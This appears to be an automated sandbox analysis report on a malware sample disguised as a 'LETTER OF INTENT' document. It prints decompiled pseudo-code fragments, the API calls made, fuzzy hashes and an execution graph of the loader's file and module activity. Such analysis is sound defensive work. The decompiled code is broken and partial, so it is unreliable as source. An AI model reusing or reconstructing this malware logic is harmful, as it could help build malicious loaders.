										E0041A0B0(_a16,  &_v684, 0x2a8);
										_t131 = _t131 + 0xc;
										L20:
										E00418700(_t120, _t115,  *((intOrPtr*)(_t120 + 0x2f4))); // executed
										__eflags = _t94;
										if(_t94 == 0) {
											break;
										} else {
											 *(_a16 + 0x14) = _v664;
											_t35 = _t120 + 0x2e8; // 0x2e8
											 *_t35 = _v132;
											_t37 = _t120 + 0x314; // 0x314
											_t95 = _t37;
											 *_t95 = 0x18;
											 *((intOrPtr*)(_t120 + 0x318)) = 0;
											 *((intOrPtr*)(_t120 + 0x320)) = 0;
											 *((intOrPtr*)(_t120 + 0x31c)) = 0;
											 *((intOrPtr*)(_t120 + 0x324)) = 0;
											 *((intOrPtr*)(_t120 + 0x328)) = 0;
											_t76 = E00417F80(_t115, _a16 + 0x220,  *((intOrPtr*)(_t120 + 0x2d0)), _t95, _t35);
											 *(_t120 + 0x2dc) = _t76;
											__eflags = _t76;
											if(_t76 < 0) {
												break;
											} else {
												_t110 = _v128;
												_t45 = _t120 + 0x2e0; // 0x2e0
												_t77 = _t45;
												_push(_t77);
												 *((intOrPtr*)(_t120 + 0x318)) = 0;
												 *((intOrPtr*)(_t120 + 0x320)) = 0;
												 *((intOrPtr*)(_t120 + 0x31c)) = 0;
												 *((intOrPtr*)(_t120 + 0x324)) = 0;
												 *((intOrPtr*)(_t120 + 0x328)) = 0;
												_push(_t95);
												_push(0x1a);
												_t105 = _a16 + 0x224;
												__eflags = _t105;
												_push(_t105);
												_push(_t115);
												 *(_t120 + 0x2e4) = _t110;
												 *_t95 = 0x18;
												 *((intOrPtr*)(_t120 + 0x2d0)) = 0x1a;
												 *_t110 =  *_t110 + _t95;
												 *_t77 =  *_t77 + _t77;
												asm("in eax, dx");
												_t79 = _t77 + _t105 |  *_t105;
												 *((intOrPtr*)(_t95 - 0x7976eb3c)) =  *((intOrPtr*)(_t95 - 0x7976eb3c)) + _t79;
												 *_t79 =  *_t79 + _t79;
												__eflags = _t79;
												if(_t79 < 0) {
													break;
												} else {
													__eflags =  *((intOrPtr*)(_a12 + 0x10)) + 0x200;
													_t61 = E0041A3A0( *((intOrPtr*)(E00419680(0, E00419660(_t105)) + 0x28))) + 2; // 0x2
													E0041A0B0( *((intOrPtr*)(_a12 + 0x10)) + 0x200,  *((intOrPtr*)(_t81 + 0x28)), _t83 + _t61);
													_t86 = E00413A40(_t115,  &_v652, 2, 0); // executed
													return _t86;
												}
											}
										}
									} else {
										goto L16;
									}
								}
							}
						}
						goto L25;
					}
					__eflags = 0;
					return 0;
				} else {
					if(__eflags <= 0) {
						 *__eax =  *__eax - __eax;
						 *((intOrPtr*)(__eax - 0x2a)) =  *((intOrPtr*)(__eax - 0x2a)) + __ecx;
						asm("les ebp, [edx]");
						_push(0);
						_push(__eax);
						_push(_t120);
						_t89 = E00413E40(_t120);
						_t125 = _t89;
						if(_t125 != 0) {
							_push(_t115);
							_t118 = _a12;
							_t89 = PostThreadMessageW(_t118, 0x111, 0, 0); // executed
							_t142 = _t89;
							if(_t89 == 0) {
								_t91 = E00409290(_t142, 1, 8) & 0x000000ff;
								 *_t91 =  *_t91;
								_t89 =  *_t125(_t118, 0x8003, _t127 + _t91 - 0x40, _t89);
							}
						}
						return _t89;
					} else {
						__ebp = __esp;
						__esp = __esp - 0x2ac;
						_push(__esi);
						__eax = 0;
						__eflags = 0;
						_v8 = 0;
						_v688 = 0;
						 &_v684 = E0041A130( &_v684, 0, 0x2a4);
						__esi = _a16;
						__ecx =  *((intOrPtr*)(__esi + 0x300));
						__edi = _a4;
						__eax = E00407280(__eflags, _a4,  *((intOrPtr*)(__esi + 0x300))); // executed
						__eax = E004199C0(__ecx);
						_t15 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
						__ebx = __eax + _t15;
						goto L10;
					}
				}
				L25:
			}


































              0x00407309
              0x0040730b
              0x0040735f
              0x00407361
              0x00407370
              0x00407376
              0x00407392
              0x00407397
              0x0040739a
              0x004073a0
              0x004073a2
              0x00000000
              0x00000000
              0x004073a4
              0x004073ac
              0x004073c6
              0x004073c9
              0x004073ca
              0x004073cd
              0x004073d0
              0x00000000
              0x004073d2
              0x004073d2
              0x00000000
              0x004073d2
              0x004073ae
              0x004073ae
              0x004073b5
              0x00000000
              0x004073b7
              0x004073b7
              0x004073be
              0x00000000
              0x004073c0
              0x004073c0
              0x004073c4
              0x004073f0
              0x004073f5
              0x004073fa
              0x004073fd
              0x00407405
              0x0040740d
              0x0040740f
              0x00000000
              0x00407411
              0x00407420
              0x00407429
              0x00407430
              0x00407435
              0x00407435
              0x00407446
              0x0040744c
              0x00407452
              0x00407458
              0x0040745e
              0x00407464
              0x0040746a
              0x00407474
              0x0040747a
              0x0040747c
              0x00000000
              0x00407482
              0x00407482
              0x00407485
              0x00407485
              0x0040748b
              0x0040748c
              0x00407492
              0x00407498
              0x0040749e
              0x004074a4
              0x004074ad
              0x004074ae
              0x004074b0
              0x004074b0
              0x004074b6
              0x004074b7
              0x004074b8
              0x004074be
              0x004074c4
              0x004074c9
              0x004074cb
              0x004074cf
              0x004074d0
              0x004074d2
              0x004074da
              0x004074dc
              0x004074de
              0x00000000
              0x004074e4
              0x004074ea
              0x0040750b
              0x00407512
              0x00407523
              0x00407531
              0x00407531
              0x004074de
              0x0040747c
              0x00000000
              0x00000000
              0x00000000
              0x004073c4
              0x004073be
              0x004073b5
              0x00000000
              0x004073ac
              0x004073d9
              0x004073df
              0x0040730d
              0x0040730d
              0x004072b0
              0x004072b2
              0x004072b7
              0x004072ba
              0x004072bc
              0x004072bd
              0x004072be
              0x004072c3
              0x004072ca
              0x004072cc
              0x004072cd
              0x004072da
              0x004072dc
              0x004072de
              0x004072ea
              0x004072f7
              0x004072fb
              0x004072fb
              0x004072fd
              0x00407302
              0x0040730f
              0x00407311
              0x00407313
              0x0040731a
              0x0040731c
              0x0040731c
              0x00407324
              0x00407327
              0x00407334
              0x00407339
              0x0040733c
              0x00407342
              0x00407347
              0x0040734f
              0x0040735a
              0x0040735a
              0x00000000
              0x0040735a
              0x0040730d
              0x00000000

              APIs
              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: 76739e20f901698dcda1f5da6d21d47beb3d7048824c40d25536308e69fd9ebf
              • Instruction ID: 6f6e70f3fba3dcf9909d8ab4c173c79609f2e09c75bf410fee7ec2c7179832cf
              • Opcode Fuzzy Hash: 76739e20f901698dcda1f5da6d21d47beb3d7048824c40d25536308e69fd9ebf
              • Instruction Fuzzy Hash: 1161C570900309AFD724DF64DC85FEBB7B8EB09304F10046EF949A7281D774A941CBAA
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00418A75 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 333 418a75-418a78 334 418a7a-418a7b 333->334 335 418a4c-418a5a call 4191d0 333->335 337 418ac5-418ae7 call 419240 334->337 338 418a7d-418ab0 call 4191d0 334->338 340 418a5f-418a74 LookupPrivilegeValueW 335->340
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 7056bcd6f64928b91b1700fc4088005a7ba183f341221da499c199913806fe6a
              • Instruction ID: a2d0a06de7dc0bbbbca700c1d77ce6db5c85b0a914901fed399fb6f6e97368fc
              • Opcode Fuzzy Hash: 7056bcd6f64928b91b1700fc4088005a7ba183f341221da499c199913806fe6a
              • Instruction Fuzzy Hash: 5C11A071200244AFE724EF68CC85EEB7BA8EF84750F14859AF94C5B242C639A9558BA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00407280 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 346 407280-4072ca call 41a130 call 41ad10 call 409b30 call 413e40 355 4072cc-4072de PostThreadMessageW 346->355 356 4072fe-407302 346->356 357 4072e0-4072fa call 409290 355->357 358 4072fd 355->358 357->358 358->356
              C-Code - Quality: 31%
              			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __esi;
				intOrPtr* _t14;
				intOrPtr* _t15;
				int _t16;
				signed int _t18;
				char* _t19;
				long _t24;
				void* _t27;
				intOrPtr* _t28;
				void* _t29;

				_v68 = 0;
				E0041A130( &_v67, 0, 0x3f);
				_t19 =  &_v68;
				E0041AD10(_t19, 3);
				_t27 = _a4 + 0x1c;
				_t14 = E00409B30(_t27,  &_v68);
				 *_t14 =  *_t14 - _t14;
				 *((intOrPtr*)(_t14 - 0x2a)) =  *((intOrPtr*)(_t14 - 0x2a)) + _t19;
				asm("les ebp, [edx]");
				_push(0);
				_push(_t14);
				_push(_t27);
				_t15 = E00413E40(_t27);
				_t28 = _t15;
				if(_t28 != 0) {
					_t24 = _a8;
					_t16 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
					_t36 = _t16;
					if(_t16 != 0) {
						L5:
						return _t16;
					}
					_t18 = E00409290(_t36, 1, 8) & 0x000000ff;
					 *_t18 =  *_t18;
					_t16 =  *_t28(_t24, 0x8003, _t29 + _t18 - 0x40, _t16);
					goto L5;
				}
				return _t15;
			}















              0x0040728f
              0x00407293
              0x00407298
              0x0040729e
              0x004072aa
              0x004072ae
              0x004072b0
              0x004072b2
              0x004072b7
              0x004072ba
              0x004072bc
              0x004072bd
              0x004072be
              0x004072c3
              0x004072ca
              0x004072cd
              0x004072da
              0x004072dc
              0x004072de
              0x004072fd
              0x00000000
              0x004072fd
              0x004072ea
              0x004072f7
              0x004072fb
              0x00000000
              0x004072fb
              0x00407302

              APIs
              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
              • Instruction ID: b237522831fa2f29c3a6f065e8e6a5a8a1bdd1e87b57dfaece1adfce5d1a8559
              • Opcode Fuzzy Hash: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
              • Instruction Fuzzy Hash: DC018431A8022876E721AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004188D2 Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON
              Download Yara Rule
              APIs
              • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: 7716b84c71980f1a8dd307046fc00bace5034a0c3e06cba556fd4c8214d88868
              • Instruction ID: d1030311b93a8d47fe3ed60a87453878cc95385ce9d5856c12068c91900ba487
              • Opcode Fuzzy Hash: 7716b84c71980f1a8dd307046fc00bace5034a0c3e06cba556fd4c8214d88868
              • Instruction Fuzzy Hash: 9CE0D8B82041429FDB04EFA9C9D089F3795AF85314718894AE8485730AC570D85ACBB2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004188E0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





              0x004188ef
              0x004188f7
              0x0041890d
              0x00418911

              APIs
              • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
              • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
              • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00418A40 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				intOrPtr _t11;
				void* _t15;

				_t7 = _a4;
				_t11 =  *((intOrPtr*)(_a4 + 0xa18));
				E004191D0(_t15, _t7, _t7 + 0xc8c, _t11, 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}






              0x00418a43
              0x00418a46
              0x00418a5a
              0x00418a70
              0x00418a74

              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
              • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
              • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00418A3C Relevance: 1.5, APIs: 1, Instructions: 24COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00418A3C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t11;
				intOrPtr _t12;
				void* _t16;

				_t8 = _a4;
				_t12 =  *((intOrPtr*)(_a4 + 0xa18));
				E004191D0(_t16, _t8, _t8 + 0xc8c, _t12, 0, 0x46);
				_t11 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t11;
			}






              0x00418a43
              0x00418a46
              0x00418a5a
              0x00418a70
              0x00418a74

              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: b45dee70ed22d17df6f0e90a2ffabdae220b0ae93979b54163b61920d7c8951f
              • Instruction ID: 70dc13c0f72bcd72c0783b85a0a15573f433d91c466f67422e70243bce41931b
              • Opcode Fuzzy Hash: b45dee70ed22d17df6f0e90a2ffabdae220b0ae93979b54163b61920d7c8951f
              • Instruction Fuzzy Hash: 88E01AB5200208AFDB14DF55CC85EE737A9AF89294F058199FE485B242C934E851CBF5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00418920 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00418920(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




              0x00418923
              0x0041893a
              0x00418948

              APIs
              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: ExitProcess
              • String ID:
              • API String ID: 621844428-0
              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
              • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
              • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 00415672 Relevance: .0, Instructions: 13COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00415672(void* __esi, void* __fp0) {

				return  *0xe7299df1;
			}



              0x00415686

              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e61c330e18b722eaf5635ac44f79757822460d77a7eb09780081277e83407bb6
              • Instruction ID: 5444c510b41dd443bfcb257791b0198e79e226132e256492a23fa7ce6c41a4ab
              • Opcode Fuzzy Hash: e61c330e18b722eaf5635ac44f79757822460d77a7eb09780081277e83407bb6
              • Instruction Fuzzy Hash: FDB09B76A591094785205E18B9C5170F3B4E387139B103767DC55635109152D4544599
              Uniqueness

              Uniqueness Score: -1.00%

              Execution Graph

              Execution Coverage:5%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:691
              Total number of Limit Nodes:83
              execution_graph 31194 2a172f0 31197 2a1732b 31194->31197 31214 2a1a010 31194->31214 31196 2a1740c 31197->31196 31205 2a09b30 31197->31205 31201 2a17390 Sleep 31202 2a1737d 31201->31202 31202->31196 31202->31201 31217 2a16f20 LdrLoadDll 31202->31217 31218 2a17120 LdrLoadDll 31202->31218 31206 2a09b54 31205->31206 31207 2a09b90 LdrLoadDll 31206->31207 31208 2a09b5b 31206->31208 31207->31208 31209 2a13e40 31208->31209 31210 2a13e4e 31209->31210 31211 2a13e5a 31209->31211 31210->31211 31219 2a142c0 LdrLoadDll 31210->31219 31211->31202 31213 2a13fac 31213->31202 31215 2a1a03d 31214->31215 31220 2a187b0 LdrLoadDll 31214->31220 31215->31197 31217->31202 31218->31202 31219->31213 31220->31215 31221 2a1d3dd 31224 2a19c70 31221->31224 31225 2a19c96 31224->31225 31232 2a08b50 31225->31232 31227 2a19cc6 31272 2a18920 31227->31272 31228 2a19ca2 31228->31227 31240 2a07e40 31228->31240 31233 2a08b5d 31232->31233 31275 2a08aa0 31232->31275 31235 2a08b64 31233->31235 31287 2a08a40 31233->31287 31235->31228 31241 2a07e67 31240->31241 31689 2a0a000 31241->31689 31243 2a07e79 31693 2a09d50 31243->31693 31245 2a07e96 31251 2a07e9d 31245->31251 31744 2a09c80 LdrLoadDll 31245->31744 31248 2a07f06 31249 2a1a260 LdrLoadDll 31248->31249 31269 2a07fe4 31248->31269 31250 2a07f1c 31249->31250 31252 2a1a260 LdrLoadDll 31250->31252 31251->31269 31697 2a0d160 31251->31697 31253 2a07f2d 31252->31253 31254 2a1a260 LdrLoadDll 31253->31254 31255 2a07f3e 31254->31255 31709 2a0aec0 31255->31709 31257 2a07f51 31258 2a13a40 7 API calls 31257->31258 31259 2a07f62 31258->31259 31260 2a13a40 7 API calls 31259->31260 31261 2a07f73 31260->31261 31262 2a07f93 31261->31262 31721 2a0ba30 31261->31721 31264 2a13a40 7 API calls 31262->31264 31267 2a07fdb 31262->31267 31270 2a07faa 31264->31270 31727 2a07c70 31267->31727 31269->31227 31270->31267 31746 2a0bad0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31270->31746 31273 2a191d0 LdrLoadDll 31272->31273 31274 2a1893f 31273->31274 31306 2a16e40 31275->31306 31279 2a08ac6 31279->31233 31280 2a08abc 31280->31279 31313 2a19520 31280->31313 31282 2a08b03 31282->31279 31324 2a088c0 31282->31324 31284 2a08b23 31330 2a08320 LdrLoadDll 31284->31330 31286 2a08b35 31286->31233 31288 2a08a5a 31287->31288 31289 2a19810 LdrLoadDll 31287->31289 31667 2a19810 31288->31667 31289->31288 31292 2a19810 LdrLoadDll 31293 2a08a81 31292->31293 31294 2a0cf60 31293->31294 31295 2a0cf79 31294->31295 31671 2a09e80 31295->31671 31297 2a0cf8c 31675 2a18450 31297->31675 31301 2a0cfb2 31305 2a0cfdd 31301->31305 31682 2a184d0 31301->31682 31303 2a18700 2 API calls 31304 2a08b75 31303->31304 31304->31228 31305->31303 31307 2a16e4f 31306->31307 31308 2a13e40 LdrLoadDll 31307->31308 31309 2a08ab3 31308->31309 31310 2a16cf0 31309->31310 31331 2a18870 31310->31331 31314 2a19539 31313->31314 31338 2a13a40 31314->31338 31316 2a19551 31317 2a1955a 31316->31317 31377 2a19360 31316->31377 31317->31282 31319 2a1956e 31319->31317 31395 2a18170 31319->31395 31645 2a06e20 31324->31645 31326 2a088e1 31326->31284 31327 2a088da 31327->31326 31658 2a070e0 31327->31658 31330->31286 31333 2a16d05 31331->31333 31334 2a191d0 31331->31334 31333->31280 31335 2a191e0 31334->31335 31337 2a19202 31334->31337 31336 2a13e40 LdrLoadDll 31335->31336 31336->31337 31337->31333 31339 2a13d75 31338->31339 31341 2a13a54 31338->31341 31339->31316 31341->31339 31403 2a17ec0 31341->31403 31343 2a13b80 31406 2a185d0 31343->31406 31344 2a13b63 31463 2a186d0 LdrLoadDll 31344->31463 31347 2a13b6d 31347->31316 31348 2a13ba7 31349 2a1a090 2 API calls 31348->31349 31351 2a13bb3 31349->31351 31350 2a13d39 31353 2a18700 2 API calls 31350->31353 31351->31347 31351->31350 31352 2a13d4f 31351->31352 31357 2a13c42 31351->31357 31472 2a13780 LdrLoadDll NtReadFile NtClose 31352->31472 31354 2a13d40 31353->31354 31354->31316 31356 2a13d62 31356->31316 31358 2a13ca9 31357->31358 31360 2a13c51 31357->31360 31358->31350 31359 2a13cbc 31358->31359 31465 2a18550 31359->31465 31362 2a13c56 31360->31362 31363 2a13c6a 31360->31363 31464 2a13640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31362->31464 31366 2a13c87 31363->31366 31367 2a13c6f 31363->31367 31366->31354 31421 2a13400 31366->31421 31409 2a136e0 31367->31409 31369 2a13c60 31369->31316 31371 2a13d1c 31469 2a18700 31371->31469 31372 2a13c7d 31372->31316 31375 2a13c9f 31375->31316 31376 2a13d28 31376->31316 31378 2a19371 31377->31378 31379 2a19383 31378->31379 31380 2a1a010 LdrLoadDll 31378->31380 31379->31319 31381 2a193a4 31380->31381 31490 2a13050 31381->31490 31383 2a193f0 31383->31319 31384 2a193c7 31384->31383 31385 2a13050 2 API calls 31384->31385 31387 2a193e9 31385->31387 31387->31383 31522 2a14380 31387->31522 31388 2a1947a 31389 2a1948a 31388->31389 31616 2a19170 LdrLoadDll 31388->31616 31532 2a18fe0 31389->31532 31392 2a194b8 31611 2a18130 31392->31611 31396 2a1818c 31395->31396 31397 2a191d0 LdrLoadDll 31395->31397 31639 2ed967a 31396->31639 31397->31396 31398 2a181a7 31400 2a1a090 31398->31400 31401 2a195c9 31400->31401 31642 2a188e0 31400->31642 31401->31282 31404 2a191d0 LdrLoadDll 31403->31404 31405 2a13b34 31404->31405 31405->31343 31405->31344 31405->31347 31407 2a185ec NtCreateFile 31406->31407 31408 2a191d0 LdrLoadDll 31406->31408 31407->31348 31408->31407 31410 2a136fc 31409->31410 31411 2a18550 LdrLoadDll 31410->31411 31412 2a1371d 31411->31412 31413 2a13724 31412->31413 31414 2a13738 31412->31414 31415 2a18700 2 API calls 31413->31415 31416 2a18700 2 API calls 31414->31416 31417 2a1372d 31415->31417 31418 2a13741 31416->31418 31417->31372 31473 2a1a2a0 LdrLoadDll 31418->31473 31420 2a1374c 31420->31372 31422 2a1344b 31421->31422 31423 2a1347e 31421->31423 31425 2a18550 LdrLoadDll 31422->31425 31424 2a135c9 31423->31424 31429 2a1349a 31423->31429 31426 2a18550 LdrLoadDll 31424->31426 31427 2a13466 31425->31427 31433 2a135e4 31426->31433 31428 2a18700 2 API calls 31427->31428 31430 2a1346f 31428->31430 31431 2a18550 LdrLoadDll 31429->31431 31430->31375 31432 2a134b5 31431->31432 31435 2a134d1 31432->31435 31436 2a134bc 31432->31436 31486 2a18590 LdrLoadDll 31433->31486 31439 2a134d6 31435->31439 31440 2a134ec 31435->31440 31438 2a18700 2 API calls 31436->31438 31437 2a1361e 31441 2a18700 2 API calls 31437->31441 31442 2a134c5 31438->31442 31443 2a18700 2 API calls 31439->31443 31446 2a134f1 31440->31446 31482 2a1a260 31440->31482 31444 2a13629 31441->31444 31442->31375 31445 2a134df 31443->31445 31444->31375 31445->31375 31450 2a13503 31446->31450 31474 2a18680 31446->31474 31449 2a13557 31451 2a1356e 31449->31451 31485 2a18510 LdrLoadDll 31449->31485 31450->31375 31452 2a13575 31451->31452 31453 2a1358a 31451->31453 31455 2a18700 2 API calls 31452->31455 31456 2a18700 2 API calls 31453->31456 31455->31450 31457 2a13593 31456->31457 31458 2a135bf 31457->31458 31477 2a19e60 31457->31477 31458->31375 31460 2a135aa 31461 2a1a090 2 API calls 31460->31461 31462 2a135b3 31461->31462 31462->31375 31463->31347 31464->31369 31466 2a191d0 LdrLoadDll 31465->31466 31467 2a13d04 31466->31467 31468 2a18590 LdrLoadDll 31467->31468 31468->31371 31470 2a191d0 LdrLoadDll 31469->31470 31471 2a1871c NtClose 31470->31471 31471->31376 31472->31356 31473->31420 31475 2a191d0 LdrLoadDll 31474->31475 31476 2a1869c NtReadFile 31475->31476 31476->31449 31478 2a19e84 31477->31478 31479 2a19e6d 31477->31479 31478->31460 31479->31478 31480 2a1a260 LdrLoadDll 31479->31480 31481 2a19e9b 31480->31481 31481->31460 31487 2a188a0 31482->31487 31484 2a1a278 31484->31446 31485->31451 31486->31437 31488 2a191d0 LdrLoadDll 31487->31488 31489 2a188bc 31488->31489 31489->31484 31491 2a13061 31490->31491 31492 2a13069 31490->31492 31491->31384 31521 2a1333c 31492->31521 31617 2a1b240 31492->31617 31494 2a130bd 31495 2a1b240 LdrLoadDll 31494->31495 31499 2a130c8 31495->31499 31496 2a13116 31498 2a1b240 LdrLoadDll 31496->31498 31500 2a1312a 31498->31500 31499->31496 31501 2a1b370 2 API calls 31499->31501 31631 2a1b2e0 LdrLoadDll RtlFreeHeap 31499->31631 31502 2a13187 31500->31502 31504 2a1b370 2 API calls 31500->31504 31501->31499 31503 2a1b240 LdrLoadDll 31502->31503 31505 2a1319d 31503->31505 31504->31500 31506 2a131da 31505->31506 31622 2a1b370 31505->31622 31507 2a1b240 LdrLoadDll 31506->31507 31509 2a131e5 31507->31509 31510 2a1b370 2 API calls 31509->31510 31516 2a1321f 31509->31516 31510->31509 31513 2a1b2a0 2 API calls 31514 2a1331e 31513->31514 31515 2a1b2a0 2 API calls 31514->31515 31517 2a13328 31515->31517 31628 2a1b2a0 31516->31628 31518 2a1b2a0 2 API calls 31517->31518 31519 2a13332 31518->31519 31520 2a1b2a0 2 API calls 31519->31520 31520->31521 31521->31384 31523 2a14391 31522->31523 31524 2a13a40 7 API calls 31523->31524 31526 2a143a7 31524->31526 31525 2a143fa 31525->31388 31526->31525 31527 2a143e2 31526->31527 31528 2a143f5 31526->31528 31529 2a1a090 2 API calls 31527->31529 31530 2a1a090 2 API calls 31528->31530 31531 2a143e7 31529->31531 31530->31525 31531->31388 31632 2a18ea0 31532->31632 31535 2a18ea0 LdrLoadDll 31536 2a18ffd 31535->31536 31537 